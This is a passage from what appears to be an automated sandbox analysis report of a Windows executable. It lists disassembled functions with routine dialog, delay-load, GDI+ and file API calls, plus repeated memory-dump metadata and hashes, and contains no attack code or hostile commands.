Part of subcall function 0037A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037A3DA

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: e0e7f04f156f40a62237deca0e83a9142f32b0b418472d496327d8b291e1416f
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 59D0C97121460DBAEF636F618C1296E7A99EB80340F04C125B84AD9191EAB9DA10EA62

Function 0037DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00371B3E), ref: 0037DD92

Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
Part of subcall function 0037B568: IsDialogMessageW.USER32(00010474,?), ref: 0037B59E
Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: f81001ffba6b69d1e3495b76a11083cbd1e0343fd34206a3c7b7964a0f2abecd
Instruction ID: ee75ec9fc387abbba984c31d28b872dda9580f5d552919ba45765d3779911914
Opcode Fuzzy Hash: f81001ffba6b69d1e3495b76a11083cbd1e0343fd34206a3c7b7964a0f2abecd
Instruction Fuzzy Hash: FED09E32144300BAD6132B51CD06F0E7AB6AB89B08F008954B288740B1CA72AD31DB11

Function 0037E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0037E5E3

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: e5e703795cf0b92d2e19c9803f2a33deb7ac73c832d9e55612018fc87ae3a20c
Instruction ID: 4deacd0ad87eb9b31513ee87a51207aa9280bf6a8f12d191f6868a588fb53902
Opcode Fuzzy Hash: e5e703795cf0b92d2e19c9803f2a33deb7ac73c832d9e55612018fc87ae3a20c
Instruction Fuzzy Hash: 18D0C9B01802809AD637EBA89886B583258BB2EB14F94C1A5F14DD9492DA6C9491E70A

Function 003698BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,003697BE), ref: 003698C8

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: faf13b29c46973c610e14ea82d909ee8beaf14403884cbb7be8a265d890fb8b5
Instruction ID: 9268aa04dce8aef46cdbc0d17eb6373e4d9e4a5353dc4f1f7188a11b2fae682c
Opcode Fuzzy Hash: faf13b29c46973c610e14ea82d909ee8beaf14403884cbb7be8a265d890fb8b5
Instruction Fuzzy Hash: 16C01238400205C68E228B249848199736AAA533A6BB5E696C029CA0A5C333CC8BEA01

Function 0037E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ee3abfbd5ddfbc5fbf199cf78f21faf9c2bc3d97cd3c444a7cdcdabdc633e5f
Instruction ID: 7529d0dffd46a62389348039ad443c5b1ce1aa613dea6cc21d3da9c239d63c93
Opcode Fuzzy Hash: 0ee3abfbd5ddfbc5fbf199cf78f21faf9c2bc3d97cd3c444a7cdcdabdc633e5f
Instruction Fuzzy Hash: F9B012FB268010FC3217E1051C02E37021CC0C8F10330D06EF82DC5480D8484E000533

Function 0037E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ac6ddc181702ec9f67fbf0508d06203bf6fa4462bbbd4bf0480ec6f6afb7f7b5
Instruction ID: da0bbaa1a40f37d6217a6179d1184094eb5a2d79eab332ef431174c10b935ce0
Opcode Fuzzy Hash: ac6ddc181702ec9f67fbf0508d06203bf6fa4462bbbd4bf0480ec6f6afb7f7b5
Instruction Fuzzy Hash: 72B012EA268010BC3217A1051D02E77021CC4C8F10330D06EF52DC5480D8440C091533

Function 0037E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f1d293d8473448eee4950b32f88101ed63ca51bc9a9d5017a1dc44b909bada40
Instruction ID: 1699ad4d8e104d9d64864efc4099f0391224a0759725872bc580d1fd22714bde
Opcode Fuzzy Hash: f1d293d8473448eee4950b32f88101ed63ca51bc9a9d5017a1dc44b909bada40
Instruction Fuzzy Hash: 0FB012EA268010FC3217F1051C02E37021CC4C8F10330D06FF82DC5480D8444C040533

Function 0037E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b26eebfd5da2e3ef73c133ec161babc5d2fdf98d7e3f721e70a1f52dd4b90ea1
Instruction ID: 683c8d6bee50e68af8d3547c10a50b34d8b423ba5145ef82c14128f8e43bd59c
Opcode Fuzzy Hash: b26eebfd5da2e3ef73c133ec161babc5d2fdf98d7e3f721e70a1f52dd4b90ea1
Instruction Fuzzy Hash: 94A002FA2B9152BD362BA2526D07D7B032DC4C9F25334E5AEF83DE98C1AD881C451873

Function 0037E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 230bbc1ffeec47b69a95a47cd9392f1f28eeb2258608b933bf066c4c111fe5c6
Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
Opcode Fuzzy Hash: 230bbc1ffeec47b69a95a47cd9392f1f28eeb2258608b933bf066c4c111fe5c6
Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473

Function 0037E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 84de9b57230a59255e9591952898b92051004fad1128f54b85df35e7e447f981
Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
Opcode Fuzzy Hash: 84de9b57230a59255e9591952898b92051004fad1128f54b85df35e7e447f981
Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473

Function 0037E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d98d4f29269d1107f51a07a792933c609c59873a7ecaf05ea7885b42dab371d5
Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
Opcode Fuzzy Hash: d98d4f29269d1107f51a07a792933c609c59873a7ecaf05ea7885b42dab371d5
Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473

Function 0037E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e9f09578398bf8ec26f4b49b33128f51321e6b3fcaf2bfd28fd4b3e7a0d63e33
Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
Opcode Fuzzy Hash: e9f09578398bf8ec26f4b49b33128f51321e6b3fcaf2bfd28fd4b3e7a0d63e33
Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473

Function 0037E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6e7f55274f890cbab6d7225ad9b81131cc5c267fdfc4ea73b69925217b844075
Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
Opcode Fuzzy Hash: 6e7f55274f890cbab6d7225ad9b81131cc5c267fdfc4ea73b69925217b844075
Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473

Function 00369F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0036903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00369F0C

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: dee11678dffa002ed6cc83904fc30bc8a9ae56053490082a976cc1827e45e3dc
Instruction ID: ea98fe1725eb9460ed20374a3a73965b577d8dd7e54f16aa78fa23687de090d2
Opcode Fuzzy Hash: dee11678dffa002ed6cc83904fc30bc8a9ae56053490082a976cc1827e45e3dc
Instruction Fuzzy Hash: 1EA022B008000E8BCE022B32CE0800C3B20FF22BC0B0002E8A00BCF0B2CB23882BCB00

Function 0037AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0037AE72,C:\Users\user\Desktop,00000000,003A946A,00000006), ref: 0037AC08

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 04ff0b072d0117875d5413b75d1dc765ca9641d7fa83c35726c626f88a217dda
Instruction ID: 53db4b9d515396d07b5f37f3f469f2e05255378125d282579719673f75eb735c
Opcode Fuzzy Hash: 04ff0b072d0117875d5413b75d1dc765ca9641d7fa83c35726c626f88a217dda
Instruction Fuzzy Hash: E7A011B02002008B82022B328F0AA0EBAAAAFA2B00F00C02AA00080030CB32C820AA02

Function 00369620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,003695D6,?,?,?,?,?,00392641,000000FF), ref: 0036963B

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cfd5e7fc5e03ad587e48bb7504521719934188e4c0defdcbef0bb462ea8b0268
Instruction ID: 441de211ebd2e385ae111f729651c0af9a128463dce77d7bec79bb05bc7f5729
Opcode Fuzzy Hash: cfd5e7fc5e03ad587e48bb7504521719934188e4c0defdcbef0bb462ea8b0268
Instruction Fuzzy Hash: 17F08270481B15DFDB328B64C459B92B7ECAB12335F049B1FD0E7439E4D771698D8A50

Non-executed Functions

Function 0037C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0037C2B1
EndDialog.USER32(?,00000006), ref: 0037C2C4
GetDlgItem.USER32(?,0000006C), ref: 0037C2E0
SetFocus.USER32(00000000), ref: 0037C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0037C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0037C358
FindFirstFileW.KERNEL32(?,?), ref: 0037C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C39C
